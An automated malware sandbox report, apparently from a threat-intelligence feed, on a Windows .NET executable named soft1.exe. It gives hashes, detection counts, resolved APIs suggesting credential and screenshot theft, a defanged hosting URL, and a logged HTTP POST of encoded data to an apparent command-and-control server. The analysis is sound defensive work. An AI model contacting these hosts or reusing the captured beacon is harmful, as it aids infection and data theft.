MalScore
100/100

soft1.exe

Is DLL Packer Anti Debug Anti VM Signed XOR AntiVirus 42/70 Related 2164
File details Download PDF Report
File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
File size: 856.00 KB (876544 bytes)
Compile time: 1979-03-21 01:30:46
MD5: 0ef724276b3aa26af86f5d8dec90ba17
SHA1: 6f3cc71f37eb73efebf692ed81a99ed99f0951bf
SHA256: 5c8a00f19dace48b0e1575c9def40afc45dfdd0c81aec27e99c133304aa14075
Import hash: f34d5f2d4577ed6d9ceec516c1f5a744
Sections 4 .text .sdata .rsrc .reloc
Directories 3 import resource relocation
Anti Virtual Machine 1 Virtual Box
First submission: 2018-11-30 15:54:05
Last submission: 2018-11-30 15:54:05
Filename detected: - soft1.exe (1)
URL file hosting
hXXp://bonheur-salon.net/soft/soft1.exeVirusTotal
Antivirus Report
Report Date Detection Ratio Permalink Update
2018-11-29 21:54:52 [42/70] VirusTotal
PE Sections 2 suspicious
Name VAddress VSize Size MD5 SHA1
.text 0x2000 0xbb754 768000 a0f96ea76dd09f6d7d81151effd0ea7e 0527e7693717480fbce609e41da3e14dccd9f4af
.sdata 0xbe000 0x19806 104960 1ec9fed92708a54d582901e96bc84e4f 6cdd282c5fb6abe936fe23598ee77fbeb7896906
.rsrc 0xd8000 0x620 2048 9361fee687fc8e9f183312fd239494c3 b9613d56754d29151d3f2f9afcd688847c163c8e
.reloc 0xda000 0xc 512 306983d855756bd858313986f51ce943 7c99468716ce44fd838a8a888addbaeefa1554d1
Meta Info
No Meta found in this file
XOR
No XOR informations found in this file.
Signature
This file isn't digitally signed
Packer(s)
Microsoft Visual C# / Basic .NET
Microsoft Visual Studio .NET
.NET executable
Microsoft Visual C# v7.0 / Basic .NET
File found
FIle type: XML
System.Xml
FIle type: Library
clrjit.dll
USER32.dll
UxTheme.dll
mscoree.dll
GDI32.dll
KERNEL32.dll
IP Found
1.12.19.3
URL(s)
file:///
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05b_64 Seven05b_64 VirtualBox 2018-11-30 15:45:35 2018-11-30 15:48:33 178

7 Behaviors detected by system signatures

Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05b_64 Seven05b_64 VirtualBox 2018-11-30 15:45:35 2018-11-30 15:48:33 178

6 Summary items with data

Files

C:\Users\Seven01\AppData\Local\Temp\soft1.exe.Local\
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80
C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
\Device\KsecDD

Read Files

C:\Windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\GdiPlus.dll
\Device\KsecDD

Write Files

Nothing to display

Delete Files

Nothing to display

Keys

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SideBySide\AssemblyStorageRoots
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\CustomLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Nls\ExtendedLocale
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ProductName
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\GRE_Initialize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Read Keys

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\CustomLocale\it-IT
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Nls\ExtendedLocale\it-IT
HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows NT\CurrentVersion\ProductName
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\GRE_Initialize\DisableMetaFiles

Write Keys

Nothing to display

Delete Keys

Nothing to display

Mutexes

A606D0EC7-72D679BB-0A5DF8A0-1A37A0DE-63BCCAB3

Resolved APIs

crypt32.dll.CryptUnprotectData
crtdll.dll.wcscmp
gdiplus.dll.GdiplusStartup
gdiplus.dll.GdiplusShutdown
gdiplus.dll.GdipCreateBitmapFromHBITMAP
gdiplus.dll.GdipGetImageEncodersSize
gdiplus.dll.GdipGetImageEncoders
gdiplus.dll.GdipDisposeImage
gdiplus.dll.GdipSaveImageToStream
ole32.dll.CreateStreamOnHGlobal
ole32.dll.GetHGlobalFromStream
kernel32.dll.ExpandEnvironmentStringsW
kernel32.dll.GetComputerNameW
kernel32.dll.GlobalMemoryStatus
kernel32.dll.CreateFileW
kernel32.dll.GetFileSize
kernel32.dll.CloseHandle
kernel32.dll.ReadFile
kernel32.dll.GetFileAttributesW
kernel32.dll.CreateMutexA
kernel32.dll.ReleaseMutex
kernel32.dll.GetLastError
kernel32.dll.GetCurrentDirectoryW
kernel32.dll.SetEnvironmentVariableW
kernel32.dll.GetEnvironmentVariableW
kernel32.dll.SetCurrentDirectoryW
kernel32.dll.FindFirstFileW
kernel32.dll.FindNextFileW
kernel32.dll.LocalFree
kernel32.dll.GetTickCount
kernel32.dll.CopyFileW
kernel32.dll.FindClose
kernel32.dll.GlobalMemoryStatusEx
kernel32.dll.CreateToolhelp32Snapshot
kernel32.dll.Process32FirstW
kernel32.dll.Process32NextW
kernel32.dll.GetModuleFileNameW
kernel32.dll.SetDllDirectoryW
kernel32.dll.GetLocaleInfoA
kernel32.dll.GetLocalTime
kernel32.dll.GetTimeZoneInformation
kernel32.dll.RemoveDirectoryW
kernel32.dll.DeleteFileW
kernel32.dll.GetLogicalDriveStringsA
kernel32.dll.GetDriveTypeA
kernel32.dll.CreateProcessW
advapi32.dll.GetUserNameW
advapi32.dll.RegCreateKeyExW
advapi32.dll.RegQueryValueExW
advapi32.dll.RegCloseKey
advapi32.dll.RegOpenKeyExW
advapi32.dll.AllocateAndInitializeSid
advapi32.dll.LookupAccountSidA
advapi32.dll.CreateProcessAsUserW
advapi32.dll.CheckTokenMembership
advapi32.dll.RegOpenKeyW
advapi32.dll.RegEnumKeyW
advapi32.dll.RegEnumValueW
advapi32.dll.CryptAcquireContextA
advapi32.dll.CryptCreateHash
advapi32.dll.CryptHashData
advapi32.dll.CryptGetHashParam
advapi32.dll.CryptDestroyHash
advapi32.dll.CryptReleaseContext
user32.dll.EnumDisplayDevicesW
user32.dll.wvsprintfA
user32.dll.GetKeyboardLayoutList
shell32.dll.ShellExecuteExW
ntdll.dll.RtlComputeCrc32
sechost.dll.LookupAccountSidLocalA
wininet.dll.InternetOpenA
wininet.dll.InternetConnectA
wininet.dll.HttpOpenRequestA
wininet.dll.HttpAddRequestHeadersA
wininet.dll.HttpSendRequestA
wininet.dll.InternetReadFile
wininet.dll.InternetCloseHandle
wininet.dll.InternetCrackUrlA
wininet.dll.InternetSetOptionA
rasapi32.dll.RasConnectionNotificationW
sechost.dll.NotifyServiceStatusChangeA
cryptbase.dll.SystemFunction036
rpcrt4.dll.RpcBindingFree

Execute Commands

Nothing to display

Started Services

Nothing to display

Created Services

Nothing to display
Behavior analysis details
Machine name Machine label Machine manager Started Ended Duration
Seven05b_64 Seven05b_64 VirtualBox 2018-11-30 15:45:35 2018-11-30 15:48:33 178

1 HTTP Request(s) detected

http://uspool.softopia.site/vvv/index.php
  • Hostname: uspool.softopia.site
  • IP Address: 0.0.0.0
  • Port: 80
  • Count: 1

POST /vvv/index.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
Host: uspool.softopia.site
Content-Length: 97
Cache-Control: no-cache

\x00\x00\x00&f\x98&f\x9e&f\x98Gp\x9d3\x10\xed&f\x99&g\xea&f\x99&f\x9cGp\x9d5p\x9d4p\x9d:\x17\xec&g\xea&f\x9eBp\x9d6\x11\xe8&f\x96Bp\x9d3p\x9cGp\x9d2\x14\x8b0f\x8b0b\xef&f\x9eG\x10\x8b1\x11\x8b0c\x8b0f\xec@\x16\xefAp\x9d0

#infosec #automation

TheSystem Itself @ 2018-11-30 15:54:27